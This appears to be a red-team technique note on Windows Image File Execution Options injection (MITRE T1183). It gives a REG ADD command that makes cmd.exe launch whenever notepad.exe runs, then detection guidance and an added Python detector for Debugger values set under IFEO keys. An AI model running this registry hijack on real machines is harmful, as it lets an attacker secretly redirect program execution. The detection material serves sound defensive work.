
T1183: Image File Execution Options Injection

Execution

Modifying the registry to set cmd.exe as the debugger for notepad.exe, so that whenever notepad.exe is executed, cmd.exe is started instead:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
{% endcode-tabs-item %} {% endcode-tabs %}

Launching notepad on the victim system:

Same from the cmd shell:

Observations

Monitoring command-line arguments and events that modify the registry keys HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> (in particular, a Debugger value being set under them) should be helpful in detecting this attack:
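As an added example (not part of the original page), the detection idea above as a small Python check run over constructed sample records: it flags both a registry value-set event and a reg.exe command line that set a Debugger value under either IFEO key, and ignores other IFEO values. The event shape and field names are assumptions, not any specific product's schema; the key regex also accepts the HKEY_LOCAL_MACHINE spelling, which goes slightly beyond the paths quoted above.

```python
import re

# Constructed sample telemetry (not real logs), in a simplified Sysmon-like shape.
SAMPLE_EVENTS = [
    {"type": "registry_set", "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options\notepad.exe\Debugger",
     "details": "cmd.exe"},
    {"type": "process_create", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r'REG ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT'
                     r'\CurrentVersion\Image File Execution Options\notepad.exe" '
                     r'/v Debugger /d "cmd.exe"'},
    # IFEO write that is not a Debugger value: must not be reported as this technique.
    {"type": "registry_set", "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options\notepad.exe\GlobalFlag",
     "details": "0x200"},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
]

# Native and Wow6432Node IFEO key, HKLM or HKEY_LOCAL_MACHINE spelling; captures the subkey name.
IFEO_KEY = re.compile(
    r"(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\Windows NT"
    r"\\CurrentVersion\\Image File Execution Options\\(?P<exe>[^\\\"]+)", re.IGNORECASE)
# "/v Debugger" and "/d <data>" as reg.exe accepts them, quoted or bare.
VALUE_NAME = re.compile(r'\s/v\s+"?Debugger"?(?:\s|$)', re.IGNORECASE)
VALUE_DATA = re.compile(r'\s/d\s+(?:"(?P<q>[^"]*)"|(?P<b>\S+))', re.IGNORECASE)


def find_ifeo_debugger_events(events):
    """Return one finding per event that sets an IFEO Debugger value."""
    findings = []
    for ev in events:
        if ev["type"] == "registry_set":
            m = IFEO_KEY.search(ev["target"])
            # Only the Debugger value redirects execution; other IFEO values are ignored.
            if m and ev["target"].rsplit("\\", 1)[-1].lower() == "debugger":
                findings.append({"source": "registry_set", "exe": m["exe"],
                                 "debugger": ev["details"], "by": ev["image"]})
        elif ev["type"] == "process_create":
            cmd = ev["command_line"]
            m = IFEO_KEY.search(cmd)
            if m and VALUE_NAME.search(cmd):
                d = VALUE_DATA.search(cmd)
                findings.append({"source": "command_line", "exe": m["exe"],
                                 "debugger": (d["q"] or d["b"]) if d else None,
                                 "by": ev["image"]})
    return findings
```

Running it over SAMPLE_EVENTS reports the two notepad.exe Debugger writes (one from the registry event, one from the command line) and nothing for the GlobalFlag write or the plain notepad launch.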

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1183" %}

{% embed url="https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" %}

{% embed url="https://blogs.msdn.microsoft.com/reiley/2011/07/29/a-debugging-approach-to-ifeo/" %}